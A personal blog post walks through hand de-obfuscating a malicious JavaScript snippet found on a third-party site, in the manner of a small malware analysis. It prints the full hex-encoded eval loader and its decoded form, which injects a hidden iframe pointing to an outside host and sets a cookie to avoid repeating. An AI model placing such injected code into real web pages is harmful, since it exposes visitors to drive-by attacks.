Logaholic.de

Avatar

queer as code!

Karsten DeubertApr 24, 2009

Twiddling with obfuscated JavaScript code

Today a friend of mine sent me a link to a blog, at which my virus-scanner went havoc. HTML/Crypt.Gen Stuff, Trojan warning, etc.
After getting the scanner to really let me see the source (…), i found this:

<script language="JavaScript" type="text/javascript">
B46F5DF="pars";B46F5DF+="eInt";D8FA33DFE494F="Stri";D8FA33DFE494F+="ng";D8FA33DFE494F+=".fr";D8FA33DFE494F+="om";D8FA33DFE494F+="CharCode";function A2E39329F3265(B5A87C40BB26CEA){var E46F3EB4=525;E46F3EB4=E46F3EB4-509;BD0AB=eval(B46F5DF+"(B5A87C40BB26CEA,E46F3EB4)");return(BD0AB);}function AFE763E61CEF(C4D8544E71077){var C58BCCF5D58E99C=982;C58BCCF5D58E99C=C58BCCF5D58E99C-980;var A04698CEC="";for(B3CA4BA50C=0;B3CA4BA50C<C4D8544E71077.length;B3CA4BA50C+=C58BCCF5D58E99C){A04698CEC+=( eval(D8FA33DFE494F+"(A2E39329F3265(C4D8544E71077.substr(B3CA4BA50C,C58BCCF5D58E99C)))"));}eval(A04698CEC);}AFE763E61CEF("69662028646F63756D656E742E636F6F6B69652E736561726368282272746E78773D372229203D3D202D3129207B0A726A7061743D646F63756D656E742E676574456C656D656E744279496428277174697427293B696628726A7061743D3D6E756C6C297B646F63756D656E742E777269746528273C696672616D652069643D71746974207372633D687474703A2F2F6773746174732E636E207374796C653D646973706C61793A6E6F6E653E3C2F696672616D653E27293B7D0A646F63756D656E742E636F6F6B6965203D202272746E78773D373B657870697265733D53756E2C2030312D4465632D323031312030383A30303A303020474D543B706174683D2F223B7D");
</script>

I now was eager to find out what this does, so i started to de-obfuscate this by hand:

1. Adding linebreaks:

B46F5DF="pars";
B46F5DF+="eInt";
D8FA33DFE494F="Stri";
D8FA33DFE494F+="ng";
D8FA33DFE494F+=".fr";
D8FA33DFE494F+="om";
D8FA33DFE494F+="CharCode";
function A2E39329F3265(B5A87C40BB26CEA){
    var E46F3EB4=525;
    E46F3EB4=E46F3EB4-509;
    BD0AB=eval(B46F5DF+"(B5A87C40BB26CEA,E46F3EB4)");
    return(BD0AB);
}

function AFE763E61CEF(C4D8544E71077){
    var C58BCCF5D58E99C=982;
    C58BCCF5D58E99C=C58BCCF5D58E99C-980;
    var A04698CEC="";
    for(B3CA4BA50C=0;B3CA4BA50C<C4D8544E71077.length;B3CA4BA50C+=C58BCCF5D58E99C){
        A04698CEC+=( eval(D8FA33DFE494F+"(A2E39329F3265(C4D8544E71077.substr(B3CA4BA50C,C58BCCF5D58E99C)))"));
    }
    eval(A04698CEC);
}

AFE763E61CEF("69662028646F63756D656E742E636F6F6B69652E736561726368282272746E78773D372229203D3D202D3129207B0A726A7061743D646F63756D656E742E676574456C656D656E744279496428277174697427293B696628726A7061743D3D6E756C6C297B646F63756D656E742E777269746528273C696672616D652069643D71746974207372633D687474703A2F2F6773746174732E636E207374796C653D646973706C61793A6E6F6E653E3C2F696672616D653E27293B7D0A646F63756D656E742E636F6F6B6965203D202272746E78773D373B657870697265733D53756E2C2030312D4465632D323031312030383A30303A303020474D543B706174683D2F223B7D");

2. Renaming the stuff, removing obfuscation:

function hex2dec(param1){
    BD0AB=parseInt(param1,16);
    return(BD0AB);
}

function decodeAndEval(param1){
    var buffer="";
    for(i=0;i<param1.length;i+=2){
        buffer+=( String.fromCharCode(hex2dec(param1.substr(i,2))) );
    }
    eval(buffer);
}

decodeAndEval("69662028646F63756D656E742E636F6F6B69652E736561726368282272746E78773D372229203D3D202D3129207B0A726A7061743D646F63756D656E742E676574456C656D656E744279496428277174697427293B696628726A7061743D3D6E756C6C297B646F63756D656E742E777269746528273C696672616D652069643D71746974207372633D687474703A2F2F6773746174732E636E207374796C653D646973706C61793A6E6F6E653E3C2F696672616D653E27293B7D0A646F63756D656E742E636F6F6B6965203D202272746E78773D373B657870697265733D53756E2C2030312D4465632D323031312030383A30303A303020474D543B706174683D2F223B7D");

3. Echoing the decoded string:

if (document.cookie.search("rtnxw=7") == -1) {
rjpat=document.getElementById('qtit');if(rjpat==null){document.write('<iframe id=qtit src=http://gstats.cn style=display:none></iframe>');}
document.cookie = "rtnxw=7;expires=Sun, 01-Dec-2011 08:00:00 GMT;path=/";}

So this small JavaScript opens an Iframe to some chinese website, which is right now marked as offensive in my firefox. I like small riddles in the morning ;)

Bookmark and Share

Related posts:

  1. Uncompressing Zip-files with subfolders in AIR applications via JavaScript

No Comments, Comment or Ping

Reply to “Twiddling with obfuscated JavaScript code”

About me

Welcome to my blog!
My Name is Karsten Deubert, I am 26 years old and a Software and Systems Engineer from Cologne, Germany.


License

Creative Commons License
This work is licensed under a Creative Commons Attribution-Share Alike 3.0 Germany License.
© Copyright 2009, Karsten Deubert

Disclaimer

The opinions expressed herein are my own personal opinions and do not represent my employers' views in any way.

Sponsored Links